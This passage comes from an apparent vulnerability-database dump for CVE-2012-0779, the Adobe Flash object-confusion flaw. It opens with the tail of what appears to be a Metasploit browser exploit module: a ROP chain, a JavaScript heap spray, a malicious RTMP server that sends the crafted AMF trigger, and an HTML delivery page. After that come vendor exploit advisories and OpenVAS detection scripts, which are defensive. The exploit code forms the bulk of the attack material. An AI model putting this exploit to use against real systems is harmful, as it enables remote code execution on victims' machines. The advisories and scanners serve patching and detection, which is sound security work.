msvcrt.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => "May 04 2012",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),\r\n\t\t\t\tOptAddress.new('RTMPHOST', [ true, "The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),\r\n\t\t\t\tOptPort.new('RTMPPORT', [ true, "The local port to RTMP service listen on.", 1935 ]),\r\n\t\t\t], self.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\r\n\t\t\treturn targets[1] #IE 6 on Windows XP SP3\r\n\t\telsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\r\n\t\t\treturn targets[2] #IE 7 on Windows XP SP3\r\n\t\telsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[3] #IE 8 on Windows XP SP3\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack("V").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack("V").first\r\n\tend\r\n\r\n\tdef ret(t)\r\n\t\treturn [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll\r\n\tend\r\n\r\n\tdef popret(t)\r\n\t\treturn [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll\r\n\tend\r\n\r\n\tdef get_rop_chain(t)\r\n\r\n\t\t# ROP chains generated by mona.py - See corelan.be\r\n\t\tprint_status("Using msvcrt ROP")\r\n\t\trop =\r\n\t\t\t[\r\n\t\t\t\t0x77c4e392, # POP EAX # RETN\r\n\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n\t\t\t\tjunk,\r\n\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t0x77c4ec00, # POP EBP # RETN\r\n\t\t\t\t0x77c35459, # ptr to 'push esp # ret'\r\n\t\t\t\t0x77c47705, # POP EBX # RETN\r\n\t\t\t\t0x00001000, # EBX\r\n\t\t\t\t0x77c3ea01, # POP ECX # RETN\r\n\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t0x77c46100, # POP EDI # RETN\r\n\t\t\t\t0x77c46101, # ROP NOP (-> edi)\r\n\t\t\t\t0x77c4d680, # POP EDX # RETN\r\n\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t0x77c4e392, # POP EAX # RETN\r\n\t\t\t\tnop, # NOPS (-> eax)\r\n\t\t\t\t0x77c12df9, # PUSHAD # RETN\r\n\t\t\t].pack("V*")\r\n\r\n\t\tcode = ret(t)\r\n\t\tcode << rand_text(119)\r\n\t\tcode << rop\r\n\t\tcode << "\\xbc\\x0c\\x0c\\x0c\\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem\r\n\t\tcode << payload.encoded\r\n\t\toffset = 2616 - code.length\r\n\t\tcode << rand_text(offset)\r\n\t\tcode << [ t['StackPivot'] ].pack("V")\r\n\t\treturn code\r\n\tend\r\n\r\n\tdef get_easy_spray(t, js_code, js_nops)\r\n\r\n\t\tspray = <<-JS\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar code = unescape("#{js_code}");\r\n\t\tvar nops = unescape("#{js_nops}");\r\n\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\r\n\t\tvar offset = nops.substring(0, #{t['Offset']});\r\n\t\tvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n\t\theap_obj.gc();\r\n\t\tfor (var z=1; z < 0x185; z++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\r\n\t\tJS\r\n\r\n\t\treturn spray\r\n\r\n\tend\r\n\r\n\r\n\tdef get_aligned_spray(t, js_rop, js_nops)\r\n\r\n\t\tspray = <<-JS\r\n\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar nops = unescape("#{js_nops}");\r\n\t\tvar rop_chain = unescape("#{js_rop}");\r\n\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\r\n\t\tvar offset = nops.substring(0, #{t['Offset']});\r\n\t\tvar shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);\r\n\r\n\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n\t\theap_obj.gc();\r\n\t\tfor (var z=1; z < 0x1c5; z++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\r\n\t\tJS\r\n\r\n\t\treturn spray\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@swf = create_swf\r\n\r\n\t\t# Boilerplate required to handled pivoted listeners\r\n\t\tcomm = datastore['ListenerComm']\r\n\t\tif comm == "local"\r\n\t\t\tcomm = ::Rex::Socket::Comm::Local\r\n\t\telse\r\n\t\t\tcomm = nil\r\n\t\tend\r\n\r\n\t\t@rtmp_listener = Rex::Socket::TcpServer.create(\r\n\t\t\t'LocalHost' => datastore['RTMPHOST'],\r\n\t\t\t'LocalPort' => datastore['RTMPPORT'],\r\n\t\t\t'Comm' => comm,\r\n\t\t\t'Context' => {\r\n\t\t\t\t'Msf' => framework,\r\n\t\t\t\t'MsfExploit' => self,\r\n\t\t\t}\t\r\n\t\t)\r\n\t\t\t\t\r\n\t\t# Register callbacks\r\n\t\t@rtmp_listener.on_client_connect_proc = Proc.new { |cli|\r\n\t\t\tadd_socket(cli)\r\n\t\t\tprint_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP")\r\n\t\t\ton_rtmp_connect(cli)\r\n\t\t}\r\n\r\n\t\t@rtmp_listener.start\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef my_read(cli,size,timeout=nil)\r\n\t\tif timeout.nil?\r\n\t\t\ttimeout = cli.def_read_timeout\r\n\t\tend\r\n\r\n\t\tbuf = ""\r\n\t\t::Timeout::timeout(timeout) {\r\n\t\t\twhile buf.length < size\r\n\t\t\tbuf << cli.get_once(size - buf.length)\r\n\t\t\tend\r\n\t\t}\r\n\t\tbuf\r\n\tend\r\n\r\n\tdef do_handshake(cli)\r\n\t\tc0 = my_read(cli, 1)\r\n\t\tc1 = my_read(cli, 1536) # HandshakeSize => 1536\r\n\t\ts0 = "\\3" # s0\r\n\t\ts1 = Rex::Text.rand_text(4) # s1.time\r\n\t\ts1 << "\\x00\\x00\\x00\\x00" # s1.zero\r\n\t\ts1 << Rex::Text.rand_text(1528) # s1.random_data\r\n\t\ts2 = c1 # s2\r\n\t\tcli.put(s0)\r\n\t\tcli.put(s1)\r\n\t\tcli.put(s2)\r\n\t\tc2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)\r\n\tend\r\n\r\n\tdef on_rtmp_connect(cli)\r\n\r\n\t\tbegin\r\n\t\t\tdo_handshake(cli)\r\n\t\t\trequest = my_read(cli, 341) # connect request length\r\n\r\n\t\t\tcase request\r\n\t\t\twhen /connect/\r\n\t\t\t\trtmp_header = "\\x03" # Chunk Stream ID\r\n\t\t\t\trtmp_header << "\\x00\\x00\\x00" # Timestamp\r\n\t\t\t\trtmp_header << "\\x00\\x00\\x71" # Body Size\r\n\t\t\t\trtmp_header << "\\x14" # AMF0 Command\r\n\t\t\t\trtmp_header << "\\x00\\x00\\x00\\x00" # Stream ID\r\n\r\n\t\t\t\t# String\r\n\t\t\t\trtmp_body = "\\x02" # String\r\n\t\t\t\trtmp_body << "\\x00\\x06" # String length\r\n\t\t\t\trtmp_body << "\\x5f\\x65\\x72\\x72\\x6f\\x72" # String: _error\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << "\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\t# Array\r\n\t\t\t\trtmp_body << "\\x0a" # AMF Type: Array\r\n\t\t\t\trtmp_body << "\\x00\\x00\\x00\\x05" # Array length: 5\r\n\t\t\t\t# Array elements\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\t# Crafter Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x0c\\x0c\\x0c\\x0c" # Modify the "\\x0c\\x0c\\x0c\\x0c" to do an arbitrary call\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << "\\x00" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack("V") + "\\x00\\x00\\x00\\x00" # Number\r\n\r\n\t\t\t\ttrigger = rtmp_header\r\n\t\t\t\ttrigger << rtmp_body\r\n\r\n\t\t\t\tcli.put(trigger)\r\n\t\t\t\t@rtmp_listener.close_client(cli)\r\n\t\t\tend\r\n\t\trescue\r\n\t\tensure\r\n\t\t\t@rtmp_listener.close_client(cli)\r\n\t\t\tremove_socket(cli)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef cleanup\r\n\t\tsuper\r\n\t\treturn if not @rtmp_listener\r\n\t\t\r\n\t\tbegin\r\n\t\t\t@rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)\r\n\t\t\tif @rtmp_listener.kind_of?(Rex::Socket)\r\n\t\t\t\t@rtmp_listener.close\r\n\t\t\t\t@rtmp_listener.stop\r\n\t\t\tend\r\n\t\t\t@rtmp_listener = nil\r\n\t\trescue ::Exception\r\n\t\tend\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error("Browser not supported: #{agent}")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status("Client requesting: #{request.uri}")\r\n\r\n\t\tif request.uri =~ /\\.swf$/\r\n\t\t\tprint_status("Sending Exploit SWF")\r\n\t\t\tsend_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tp = payload.encoded\r\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\r\n\t\tjs_nops = Rex::Text.to_unescape("\\x0c"*4, Rex::Arch.endian(my_target.arch))\r\n\r\n\t\tif not my_target['Rop'].nil?\r\n\t\t\tjs_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\r\n\t\t\tjs = get_aligned_spray(my_target, js_rop, js_nops)\r\n\t\telse\r\n\t\t\tjs = get_easy_spray(my_target, js_code, js_nops)\r\n\t\tend\r\n\r\n\t\tjs = heaplib(js, {:noobfu => true})\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\tswf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\r\n\t\tswf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"\r\n\r\n\t\tif datastore['RTMPHOST'] == '0.0.0.0'\r\n\t\t\trtmp_host = Rex::Socket.source_address('1.2.3.4')\r\n\t\telse\r\n\t\t\trtmp_host = datastore['RTMPHOST']\r\n\t\tend\r\n\r\n\t\trtmp_port = datastore['RTMPPORT']\r\n\r\n\t\thtml = %Q|\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\t#{js}\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body>\r\n\t\t<center>\r\n\t\t<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"\r\n\t\tid="test" width="1" height="1"\r\n\t\tcodebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n\t\t<param name="movie" value="#{swf_uri}" />\r\n\t\t<param name="FlashVars" value="var1=#{rtmp_host}&var2=#{rtmp_port}"\r\n\t\t<embed src="#{swf_uri}" quality="high"\r\n\t\twidth="1" height="1" name="test" align="middle"\r\n\t\tallowNetworking="all"\r\n\t\ttype="application/x-shockwave-flash"\r\n\t\tpluginspage="http://www.macromedia.com/go/getflashplayer"\r\n\t\tFlashVars="var1=#{rtmp_host}&var2=#{rtmp_port}">\r\n\t\t</embed>\r\n\r\n\t\t</object>\r\n\t\t</center>\r\n\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\r\n\t\tprint_status("Sending html")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\n\tdef create_swf\r\n\t\tpath = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0779.swf" )\r\n\t\tfd = ::File.open( path, "rb" )\r\n\t\tswf = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\treturn swf\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* Flash Player 11.2.202.228\r\n\r\n(348.540): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000\r\neip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\r\nFlash32_11_2_202_228!DllUnregisterServer+0x300e84:\r\n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]\r\nds:0023:44444470=????????\r\n\r\n0:000> u eip\r\nFlash32_11_2_202_228!DllUnregisterServer+0x300e84:\r\n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]\r\n104b1b30 53 push ebx\r\n104b1b31 ffd0 call eax\r\n\r\n=end\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-73304"}], "saint": [{"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "description": "Added: 06/29/2012 \nCVE: [CVE-2012-0779](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779>) \nBID: [53395](<http://www.securityfocus.com/bid/53395>) \nOSVDB: [81656](<http://www.osvdb.org/81656>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAdobe Flash Player 11.2.202.233 (and earlier) on Windows is vulnerable to an \"object confusion\" vulnerability. A remote attacker who convinces a user with the vulnerable Flash Player to open a specially crafted file could exploit this issue to execute arbitrary code in the context of the user running the affected application. \n\n### Resolution\n\nUpdate to Flash Player 11.2.202.235 or newer on Windows systems. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb12-09.html> \n<http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx> \n\n\n### Limitations\n\nThis exploit has been tested against Adobe Systems Flash Player 11.2.202.233 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe HTML page must be opened using Firefox 12 (only on Windows XP) or Internet Explorer 7, 8, or 9 on the target. \n\nJRE 6 must be installed on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-06-29T00:00:00", "published": "2012-06-29T00:00:00", "id": "SAINT:527A38F1B0C7A74B0399779CE9DD8CAB", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/flash_object_confusion", "title": "Adobe Flash Player Object Confusion Code Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:25", "bulletinFamily": "exploit", "description": "Added: 06/29/2012 \nCVE: [CVE-2012-0779](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779>) \nBID: [53395](<http://www.securityfocus.com/bid/53395>) \nOSVDB: [81656](<http://www.osvdb.org/81656>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAdobe Flash Player 11.2.202.233 (and earlier) on Windows is vulnerable to an \"object confusion\" vulnerability. A remote attacker who convinces a user with the vulnerable Flash Player to open a specially crafted file could exploit this issue to execute arbitrary code in the context of the user running the affected application. \n\n### Resolution\n\nUpdate to Flash Player 11.2.202.235 or newer on Windows systems. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb12-09.html> \n<http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx> \n\n\n### Limitations\n\nThis exploit has been tested against Adobe Systems Flash Player 11.2.202.233 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe HTML page must be opened using Firefox 12 (only on Windows XP) or Internet Explorer 7, 8, or 9 on the target. \n\nJRE 6 must be installed on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-06-29T00:00:00", "published": "2012-06-29T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/flash_object_confusion", "id": "SAINT:9D986423B6C5EC5230B363E85437DF97", "title": "Adobe Flash Player Object Confusion Code Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "description": "Added: 06/29/2012 \nCVE: [CVE-2012-0779](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779>) \nBID: [53395](<http://www.securityfocus.com/bid/53395>) \nOSVDB: [81656](<http://www.osvdb.org/81656>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAdobe Flash Player 11.2.202.233 (and earlier) on Windows is vulnerable to an \"object confusion\" vulnerability. A remote attacker who convinces a user with the vulnerable Flash Player to open a specially crafted file could exploit this issue to execute arbitrary code in the context of the user running the affected application. \n\n### Resolution\n\nUpdate to Flash Player 11.2.202.235 or newer on Windows systems. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb12-09.html> \n<http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx> \n\n\n### Limitations\n\nThis exploit has been tested against Adobe Systems Flash Player 11.2.202.233 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe HTML page must be opened using Firefox 12 (only on Windows XP) or Internet Explorer 7, 8, or 9 on the target. \n\nJRE 6 must be installed on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-06-29T00:00:00", "published": "2012-06-29T00:00:00", "id": "SAINT:A145AC40B5A9B854E5E8028916AEE025", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/flash_object_confusion", "type": "saint", "title": "Adobe Flash Player Object Confusion Code Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:39:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2012-12-13T00:00:00", "id": "OPENVAS:1361412562310850271", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850271", "title": "SuSE Update for update openSUSE-SU-2012:0594-1 (update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0594_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for update openSUSE-SU-2012:0594-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850271\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:01:54 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0779\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0594_1\");\n script_name(\"SuSE Update for update openSUSE-SU-2012:0594-1 (update)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.4|openSUSE12\\.1)\");\n script_tag(name:\"affected\", value:\"update on openSUSE 12.1, openSUSE 11.4\");\n script_tag(name:\"insight\", value:\"flash-player update to 11.2.202.235 fixes a potential\n remote code execution vulnerability\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.235~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.235~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.235~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.235~21.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.235~21.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.235~21.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-20T13:21:20", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.", "modified": "2017-12-19T00:00:00", "published": "2012-05-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802772", "id": "OPENVAS:802772", "title": "Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_obj_code_exec_vuln_win.nasl 8178 2017-12-19 13:42:38Z cfischer $\n#\n# Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\ntag_insight = \"The flaw is due to an error related to object confusion.\n\n NOTE: Further information is not available.\";\n\ntag_impact = \"Successful exploitation will let attackers to create crafted Flash content\n that, when loaded by the target user, will trigger an object confusion flaw\n and execute arbitrary code on the target system.\n Impact Level: System/Application\";\ntag_affected = \"Adobe Flash Player version prior to 10.3.183.19 on Windows\n Adobe Flash Player version 11.x prior to 11.2.202.235 on Windows\";\ntag_solution = \"Upgrade to Adobe Flash Player version 10.3.183.19 or 11.2.202.235 or later,\n For details refer, http://www.adobe.com/downloads/\";\ntag_summary = \"This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.\";\n\nif(description)\n{\n script_id(802772);\n script_version(\"$Revision: 8178 $\");\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 14:42:38 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 13:53:41 +0530 (Tue, 08 May 2012)\");\n script_name(\"Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49096/\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1027023\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 